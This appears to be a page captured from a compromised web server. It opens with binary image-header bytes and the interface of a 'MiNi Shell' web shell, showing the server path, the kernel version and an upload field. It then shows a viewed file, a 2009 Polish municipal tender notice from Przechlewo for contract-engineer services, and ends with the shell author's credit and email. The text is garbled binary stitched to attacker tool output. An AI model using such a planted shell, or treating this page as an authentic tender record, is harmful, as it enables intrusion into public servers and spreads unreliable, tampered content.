JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090102/591-N-2009.html

<p class="kh_header"><b>Przechlewo: Pełnienie przez Wykonawcę funkcji Inżyniera Kontraktu dla inwestycji realizowanej przez Gminę Przechlewo zgodnie z projektem dofinansowanym z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 Działanie 8.2. Lokalna infrastruktura ochrony środowiska pt.: Rozbudowa selektywnej zbiórki odpadów oraz budowa kompostowni osadów ściekowych i odpadów biodegradowalnych w Gminie Przechlewo</b><br>
<b>Numer ogłoszenia: 591 - 2009; data zamieszczenia: 02.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Przechlewo , ul. Człuchowska 26, 77-320 Przechlewo, woj. pomorskie, tel. 059 8334301, faks 059 8334631.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie przez Wykonawcę funkcji Inżyniera Kontraktu dla inwestycji realizowanej przez Gminę Przechlewo zgodnie z projektem dofinansowanym z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 Działanie 8.2. Lokalna infrastruktura ochrony środowiska pt.: Rozbudowa selektywnej zbiórki odpadów oraz budowa kompostowni osadów ściekowych i odpadów biodegradowalnych w Gminie Przechlewo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie przez Wykonawcę  funkcji Inżyniera Kontraktu dla inwestycji realizowanej przez gminę Przechlewo zgodnie   z   projektem   dofinansowywanym Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 Działanie 8.2. Lokalna infrastruktura ochrony środowiska pt.: Rozbudowa selektywnej zbiórki odpadów oraz budowa kompostowni osadów ściekowych i odpadów biodegradowalnych w Gminie Przechlewo

Do zadań Inżyniera Kontraktu, zwanego dalej Inżynierem, należeć będzie ogół spraw związanych z zarządzaniem  inwestycją  realizowaną  przez Gminę Przechlewo w  ramach  projektu  pt.  Rozbudowa  selektywnej zbiórki odpadów oraz budowa kompostowni osadow ściekowych i odpadów biodegradowalnych w Gminie Przechlewo. Projekt obejmuje:

a) budowa kompostowni	

b) budowa systemu selektywnej zbiórki odpadów	
	

Szczegółowy zakres inwestycji określony został w Koncepcji  Programowo-Przestrzennej załączonej  do niniejszego SIWZ (załącznik nr 6), a zakres zadań Inżyniera zawarto w projekcie umowy.

 Zamówienie   będzie   współfinansowane   ze   środków   Unii   Europejskiej   -   projekt   z   Programu Operacyjnego dla Wojewodztwa Pomorskiego na lata 2007-2013  Działanie 8.2. Lokalna infrastruktura     ochrony środowiska pt.: Rozbudowa  selektywnej zbiórki odpadów oraz budowa kompostowni osadów ściekowych i odpadów biodegradowalnych w Gminie Przechlewo..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający 	żąda 	wniesienia 	wadium. 	Kwota 	wadium 	wymagana 	do 	wzięcia 	udziału w postępowaniu wynosi 2.500,00 PLN (dwa tysiące pięćset złotych)

 
             Wadium może być wnoszone w jednej lub kilku następujących   formach:
                  -    pieniądzu,
- 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z ty m,
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- 	gwarancjach bankowych,
- 	gwarancjach ubezpieczeniowych,
- 	poręczeniach udzielonych przez podmioty, o których mowa w art. 6, ust. 3, pkt 4 b) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz.U. Nr 109, poz.
1158 z późn. zm.).

Wadium  wniesione  w  formach  innych  niż  pieniądzu  musi  zawierać  zobowiązanie  gwaranta  l ub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 5 ustawy Prawo Zamówień Publicznych. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, wadium to musi obejmować zobowiązanie gwaranta lub poręczyciela z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.

Wadium  wnoszone  w pieniądzu  należy  wpłacić 	przelewem  na rachunek  bankowy  Zamawiającego: Bank Spółdzielczy w Człuchowie O/Przechlewo 81 9326 0006 0060 0109 2000 0080              z dopiskiem   INŻ YNIER KONTRAKTU

Wadium wnosi się przed upływem terminu składania ofert. W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku  bankowego Zamawiającego.

W  przypadku  wniesienia  wadium  w  pozostałych  formach,  innych  niż  pieniądz,  do  oferty   należy dołączyć,  w  osobnej  koszulce  oryginał  dokumentu  wadium  -  nie  łączyć  go  na  trwale  z   ofertą. Dodatkowo  należy  do  oferty  dołączyć,  potwierdzoną  za  zgodność  z  oryginałem,  kopię  dokumentu wadium.      Oferta   nie   zabezpieczona   akceptowalną    formą    wadium   zostanie   odrzucona    bez rozpatrywania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1) nie są wykluczeni z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w Art. 24 Prawa Zamówień Publicznych,
2)  spełniają warunki określone w Art. 22 ust. 1 pkt 1-4 Prawa Zamówień Publicznych, tzn.:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawia pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

3) spełniają następujące warunki szczegółowe:
a)	  wskażą do wykonania niniejszego zamówienia niżej określone osoby wraz z informacjami na temat ich kwalifikacji, które są niezbędne do wykonania przedmiotowego zamówienia, a także określeniem zakresu wykonywanych przez nich czynności:
-	 1 osoba na stanowisku Inżyniera Rezydenta (Lidera Zespołu), posiadająca wyższe wykształcenie techniczne oraz uprawnienia budowlane w dowolnej specjalności inżynierskiej, co najmniej 5-letnie doświadczenie zawodowe w kierowaniu zespołem ludzi, prowadząca nadzór nad inwestycjami budowlanymi, pełniąca co najmniej raz funkcję Inżyniera Rezydenta (Inżyniera Kontraktu, Przedstawiciela Inżyniera Kontraktu itp.) przy realizacji zakończonej inwestycji budowlanej realizowanej z udziałem środków unijnych, o całkowitej wartości inwestycji min 1 mln zł. Od Inżyniera Rezydenta wymagana jest znajomość procedur programów unijnych (w szczególności RPO WP na lata 2007 - 2013). UWAGA- Zamawiający dopuszcza pełnienie przez jedną osobę jednocześnie funkcji Kierownika Zespołu (Inżyniera Rezydenta) i funkcji jednego z inspektorów,
-	co najmniej  1 osoba na stanowisku Inspektora Nadzoru w specjalności konstrukcyjno-budowlanej, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależąca do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,
-	co najmniej  1 osoba na stanowisku Inspektora Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, posiadające uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależące do Okręgowej Izby Inżynierów Budownictwa, posiadające co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowania budową,
-	 1 osoba na stanowisku Inspektora Nadzoru w specjalności elektrycznej, posiadająca uprawnienia bez ograniczeń w zakresie prowadzenia i nadzoru robót elektrycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów przynależąca do Okręgowej Izby Inżynierów Budownictwa, posiadająca co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych i/lub kierowania budową,
-	co najmniej  1 osoba na stanowisku Specjalisty ds. Rozliczeń, posiadająca wyższe wykształcenie ekonomiczne, finansowe, zarządzanie oraz co najmniej 5 -letnie doświadczenie zawodowe w zakresie zarządzania finansami, uczestnicząca w rozliczeniu przynajmniej jednej zakończonej inwestycji realizowanej z udziałem środków unijnych, oraz minimum 5 inwestycji realizowanych z udziałem środków NFOŚ, WFOŚ lub Ekofundusz.

b)	  Firma lub osoby przewidziane do realizacji zadania wykonały w okresie ostatnich 3 lat (licząc od dnia publikacji ogłoszenia  na stronie UZP, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, następujące usługi:
-	co najmniej 2 usługi, których przedmiotem był nadzór nad realizacją zakończonych robót budowlanych  realizowanych z udziałem środków unijnych, które zostały odebrane i rozliczone bez uwag,
-	co najmniej 2 usługi, których przedmiotem było przygotowanie materiałów przetargowych zgodnych z polskimi przepisami dotyczącymi zamówień publicznych dla Kontraktów na dokumentacje techniczne lub roboty budowlane realizowane z udziałem środków unijnych,
-	co najmniej 2 usługi, których przedmiotem było przygotowanie materiałów dla uzyskania decyzji  o środowiskowych uwarunkowaniach realizacji inwestycji (wnioski o wydanie decyzji środowiskowych, Raporty Oddziaływania na Środowisko)

c)	posiadają za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres, łączny przychód w kwocie co najmniej 300 000,00 zł.

Ocena spełniania ww. warunków dokonana zostanie zgodnie z formuł ą spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> FORMULARZ OFERTY, stanowiący integralną część niniejszego SIWZ, wypełniony i podpisany przez osobę uprawnioną do reprezentowania Wykonawcy i składania oświadczeń woli (Załącznik nr 1 do SIWZ)
-  Aktualny odpis z właściwego  rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej,   jeżeli  odrębne  przepisy   wymagają   wpisu  do  rejestru  lub  zgłoszenie   do  ewidencji działalności gospodarczej, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym przedmiotem  zamówienia  oraz zawierające  nazwisko  osoby  (osób)  uprawnionych  do  reprezentowania firmy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert;
-	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert;
-	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem składania ofert,
-	Aktualne zaświadczenie  właściwego  Urzędu Skarbowego  potwierdzające,  że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-	Aktualne zaświadczenie  właściwego  Urzędu Skarbowego  potwierdzające,  że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-	Aktualne zaświadczenie  właściwego  Urzędu Skarbowego  potwierdzające,  że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie,  odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji  organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-	Wykaz osób upoważnionych do reprezentowania Wykonawcy i składania oświadczeń woli;
-	Wykaz  wykonanych  usług  w  okresie  ostatnich  trzech  lat  przed  dniem  wszczęcia  postępowania  o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających,  że usługi te zostały wykonane z należytą starannością - Załącznik nr 3 do SIWZ;
-	Wykaz  osób, 	którymi  dysponuje  lub  będzie  dysponował  Wykonawca  i  które  będą uczestniczyć  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia,  niezbędnych  do  wykonania  zamówienia,  a  także zakresu  wykonywanych  przez  nich czynności - Załącznik nr 4 do SIWZ. Do wykazu należy dołączyć dokumenty stwierdzające, że  osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania  takich  uprawnień,  wymagane  decyzje o nadaniu uprawnień  oraz aktualne  zaświadczenia  o przynależności do właściwej terenowo izby inżynierów oraz dokumenty potwierdzające min. 5 letnie doświadczenie zawodowe ;
-	Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa pkt 10 lit i niniejszej specyfikacji, wykonawca wskazał osoby, którymi będzie dysponować;
-	Wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat zakresu wykonywanych przez nich czynności.
-	Zaakceptowany projekt umowy;
-	Wyceniony wykaz planowanych usług;
-	dokumenty potwierdzające, że za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - to za ten okres, oferent osiągnął łączny przychód w kwocie co   najmniej 300 000,00 zł.
Uwaga:
a)  Wykaz  składają  tylko  Wykonawcy,  którzy  zamierzają  powierzyć  wykonanie  części  zamówienia podwykonawcom.
b) wykazie podmiotów należy wskazać części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom oraz podać nazwy (firmy) proponowanych podwykonawców.
-	Dowód wniesienia wadium;
-	Zaakceptowany projekt umowy - załącznik nr 5.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> htpp://bip.przechlewo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przechlewo
ul. Człuchowska 26
77 - 320 Przechlewo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2009 godzina 10:00, miejsce: Urząd Gminy Przechlewo
ul. Człuchowska 26
77 - 320 Przechlewo.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 13.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com